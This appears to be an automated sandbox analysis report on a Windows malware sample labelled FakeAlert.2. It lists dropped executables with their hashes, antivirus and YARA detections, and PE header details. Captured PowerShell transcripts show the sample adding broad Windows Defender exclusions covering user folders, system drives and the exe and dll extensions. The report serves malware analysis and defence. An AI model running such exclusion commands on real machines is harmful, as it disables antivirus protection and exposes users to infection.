                                                                                                                                                                                                                          SSDEEP:24:bsF+039SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+G9+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:BD38955B991754EFE470B8DD1FDDF581
                                                                                                                                                                                                                          SHA1:D3E2177D57A5622FDA732CBF9F2315F1974924D0
                                                                                                                                                                                                                          SHA-256:39E3B7C900CD1A506A61DC377E9DC0FBDA1FA1A56F468AC4C6B53BE210A758FA
                                                                                                                                                                                                                          SHA-512:15AE86563E7518EB2E2B29987414C4C2A6590030C8DB796B6C8A0073F50B52D707F79E28A3E58BAF33E42A281641E1A13D688D18095F1F431DE93493CA3C98C0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h2QCmLkBa5UMVbBw2_3n4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tARkXYN.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2755014329235905
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0Z/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK++/+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:354E2C57D378E5EA6BC9709146EAD0BC
                                                                                                                                                                                                                          SHA1:CA1F92B59F6E49813EE4C3B224DCBE188B482728
                                                                                                                                                                                                                          SHA-256:EC8F675F0B39B4FE025E1E1FFEE9EAD23C18F22A578407CFB061059C2EC5C1A8
                                                                                                                                                                                                                          SHA-512:4305F1497F8E9AA6BF4AB37126D2DAE314B7DA2BECEC76009D6EB498FE1984C75E21E8ED20E0340C98D584C91A1D2FB7395BEB77931574534B202A14B8C2FE44
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UybNnfUTId6PZOGyPPR7KA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\td7DLxd.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.267316178507448
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+07ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:0E6661BB2B5A360FAD648504CFAB865F
                                                                                                                                                                                                                          SHA1:DA492B9CB24E48B17B969E3B3D963519F97F099F
                                                                                                                                                                                                                          SHA-256:E06FF37FA3DE709ACC66E9504BF60F44F395DE2E51588D7BFA944AEBD532FA7A
                                                                                                                                                                                                                          SHA-512:DD6C5F2C6CBE63D8E824D859A211380DD28C15A59944D1C21497561112F9F3E103E69A60C01F35991E9A0C40F7217100D8D6E76048184CAEE380E94620B12BAE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2OHPjf6y9NY3HVV-pbgiUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\udfrielser.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):31
                                                                                                                                                                                                                          Entropy (8bit):4.453880987666651
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:DIjAW11wA:DYkA
                                                                                                                                                                                                                          MD5:9ACAEC3B95B7873B0B438825AA485B5B
                                                                                                                                                                                                                          SHA1:8A7A84F97759EE701402C96B0B5427E031AA92CD
                                                                                                                                                                                                                          SHA-256:13B015F0138E1D08D4A91CA186CF126CAD93ED8F2900457EA1212E816D70BCC5
                                                                                                                                                                                                                          SHA-512:F95ED36556398C6E08DE3466A472504011FBA1F27A77ED310C10F47784B464C9B49FD0F06DF161766F47BD106B3BC70E610BDD3AE717E290989813A7AB7D763F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:[GLASFIBRES]..Lerdues61=Swept..

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\uniformerede.exe

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1270272
                                                                                                                                                                                                                          Entropy (8bit):7.2217362129262685
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24576:TnsJ39LyjbJkQFMhmC+6GD9pYhK8VbNIf8gV2D:TnsHyjtk2MYC5GDwhKzy
                                                                                                                                                                                                                          MD5:FEDAD1ADEC8A1D90444051B5BDC6445D
                                                                                                                                                                                                                          SHA1:41AD10EE96250D8186D02E3D96923163CB664247
                                                                                                                                                                                                                          SHA-256:8B0667EC191E96C251FCE90FD0DEECCC09F1024F78FAF78B9FF32DED8B7CBB3D
                                                                                                                                                                                                                          SHA-512:303A40AC70E1E0BEDC08B55F5A0750A29F7E6EBCB55406293DD0F939D816CADC7FD0F6B604D607FD7478EB851A3648B1E5456CA51C971E494DA680FA44F5A8FE
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......t....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...t...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\Desktop\._cache_uniformerede.exe

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):498497
                                                                                                                                                                                                                          Entropy (8bit):7.745692538224731
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:UYhK8VbimV4PPzrMx6I/zghbBmJY18c2qt:UYhK8VbNIf8gV2w
                                                                                                                                                                                                                          MD5:C4B2332489C0BA3E3F2A262F1C2C31B8
                                                                                                                                                                                                                          SHA1:9EB3D3CB6B4F160F4DC5A8921A8483A145E814FC
                                                                                                                                                                                                                          SHA-256:9E5C0EB06D969F8DD4844C1ABAB791C59FEBDDDD82A5239CBCBEB4570DF07A06
                                                                                                                                                                                                                          SHA-512:B6DD828059E5EA139D691EB2D813E9349F6342E57017F2E57C76C3CF2A94C460A9569561EB18AC22E300992F6CDB44C67C05E438F6A3878E6450A525CE92A9BB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..............................................N...........................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc....N.......P..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2262528
                                                                                                                                                                                                                          Entropy (8bit):7.487265723978036
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:onsHyjtk2MYC5GDzso5AJs+gYGh3JfEwVu4H:onsmtk2aS5AJJcEws4H
                                                                                                                                                                                                                          MD5:FA4C249127C8D6D3661A369551570EB3
                                                                                                                                                                                                                          SHA1:BB1FAA2CD5C36DC224BF162B6C7D381F91A49431
                                                                                                                                                                                                                          SHA-256:4B7D1627FBFEFB6B1E47A2AF6E4EC95A542C219EACA1AEF57949FA76378D65A1
                                                                                                                                                                                                                          SHA-512:141F2CDE2F424B8883203463AC093B5789A6C2C2B359CA6CF54E9FA8068F91354CC6873DD885CDC92B60D524C9E9080A710036E39764F4931586F38599A32063
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\Documents\20220527\PowerShell_transcript.701188.PEGMRVYd.20220527043744.txt

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5883
                                                                                                                                                                                                                          Entropy (8bit):5.400215318736802
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:BZIhtNiyqDo1ZQUZLhtNiyqDo1Ze3v1vvvjZWhtNiyqDo1ZsSv/v/v2Zp:v
                                                                                                                                                                                                                          MD5:D69467F265F7D0E645CA865DEACA44D9
                                                                                                                                                                                                                          SHA1:874D64130A943BE590F623C1A35D3E7276035C82
                                                                                                                                                                                                                          SHA-256:715C6B499837F4C13A8ADE747B1B73A2C66137F495324F6D4FD173BECFB717B2
                                                                                                                                                                                                                          SHA-512:4DF0F16E5CC4248DD1EBD05A1049696867A150517838AE69BD2C3CB6221F32B23DD25ABE8CB52EF0AE9CE091DBDDBE44D401389B9D4FF91150ABA6AC3323C2E5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527043746..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force..Process ID: 6348..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527043746..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Start time: 20220527044151.

                                                                                                                                                                                                                          C:\Users\user\Documents\20220527\PowerShell_transcript.701188.kN_b0V1N.20220527043800.txt

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5443
                                                                                                                                                                                                                          Entropy (8bit):5.38492406816387
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:BZLhtNdqDo1ZMZthtNdqDo1Z3NgC4jZThtNdqDo1ZDBooiZB:8
                                                                                                                                                                                                                          MD5:0AB05038288EB62F928B5796E3AB532F
                                                                                                                                                                                                                          SHA1:A4A7A5967536C785C37C11362D29E12274F9D95A
                                                                                                                                                                                                                          SHA-256:CF1228D74864069EE2EE22E31725F4716D07F8EF048DC87260AA53696EC5CCBD
                                                                                                                                                                                                                          SHA-512:07C77B211F3B8C944A9AD1BD0B1ED0E26B952E1EB6CACD74BCEC5D7D2FAA75CE95133C38BA447AF36D7C0C2DC3A06635755CB25702F95F1F76ECC43C3E878129
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527043802..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force..Process ID: 6700..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527043802..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220527044104..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)

                                                                                                                                                                                                                          C:\Users\user\Documents\DUUDTUBZFW\EOWRVPQCCS.xlsm

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                                                          C:\Users\user\Documents\DUUDTUBZFW\~$EOWRVPQCCS.xlsx

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                                                                          Entropy (8bit):1.6081032063576088
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                                                          MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                                                          SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                                                          SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                                                          SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                                                          C:\Users\user\Documents\DUUDTUBZFW\~$cache1

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                                                                          Entropy (8bit):6.644060003425038
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I4r:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                                                                                                                          MD5:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          SHA1:B1E3866401ECA22981F985C17CB4CD9C36F85486
                                                                                                                                                                                                                          SHA-256:2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
                                                                                                                                                                                                                          SHA-512:ED72F56294BDF292A6EB1953CD657842CCFA2DCF3C5E69F24A1B11E19E5D8BD73DA5AAFB5F171CE91DBB07776CF8C2BF9028035E152E2CC8311A3CD21E51A886
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.687518184227138
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                          • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                          File name:SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                                                                                                                                                                                                          File size:1490944
                                                                                                                                                                                                                          MD5:c5bf732066ab84d1abba5b27638a5191
                                                                                                                                                                                                                          SHA1:07b3b8a0e9008e459bd7ba727dd8380320dbc5ad
                                                                                                                                                                                                                          SHA256:a4bdfb7869d435589479e095b8d0c9c2b8f987bd3a8c961424376f18c31c650f
                                                                                                                                                                                                                          SHA512:2813858f134a0535777e51add46568f6211cc46f23c621bdd74f946665ae918c9b33bc5b54d2de26f087887aed87ead559c5c951eb6e0c3679253bc42724b86e
                                                                                                                                                                                                                          SSDEEP:24576:Nso5AJseqW68ZKg1gYLCh3JgzRQJHhrbMDEVuI2N1q:Nso5AJs+gYGh3JfEwVu4
                                                                                                                                                                                                                          TLSH:6F65BE88E9CEA255E81B9774E33DCC3851116D6EACF8184C6CCA7E2337773A6452B631
                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@.................................<......................................

                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                          Icon Hash:c4c4c4c8ccd4d0c4

                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Entrypoint:0x4014a5
                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                          Import Hash:2a2a662be9dffc461398e7c94d0b55b4

                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          sub esp, 00000008h
                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                          mov eax, 00000004h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, 00000000h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D61h
                                                                                                                                                                                                                          add esp, 0Ch
                                                                                                                                                                                                                          mov eax, 00401483h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D83h
                                                                                                                                                                                                                          mov eax, 00000001h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D80h
                                                                                                                                                                                                                          add esp, 04h
                                                                                                                                                                                                                          mov eax, 00030000h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, 00010000h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D74h
                                                                                                                                                                                                                          add esp, 08h
                                                                                                                                                                                                                          mov eax, dword ptr [005383BCh]
                                                                                                                                                                                                                          mov ecx, dword ptr [005383C0h]
                                                                                                                                                                                                                          mov edx, dword ptr [005383C4h]
                                                                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, dword ptr [00539000h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push edx
                                                                                                                                                                                                                          push ecx
                                                                                                                                                                                                                          mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D4Eh
                                                                                                                                                                                                                          add esp, 14h
                                                                                                                                                                                                                          mov eax, dword ptr [005383BCh]
                                                                                                                                                                                                                          mov ecx, dword ptr [005383C0h]
                                                                                                                                                                                                                          mov edx, dword ptr [005383C4h]
                                                                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                          mov eax, dword ptr [edx]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, dword ptr [ecx]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46B2Ch
                                                                                                                                                                                                                          add esp, 0Ch
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D24h
                                                                                                                                                                                                                          add esp, 04h
                                                                                                                                                                                                                          leave
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          sub esp, 00000004h
                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                          mov eax, dword ptr [005383BCh]
                                                                                                                                                                                                                          mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                                          mov dword ptr [eax], ecx
                                                                                                                                                                                                                          mov eax, dword ptr [00000000h]

                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1383600x3c.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x13a0000x34db8.rsrc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
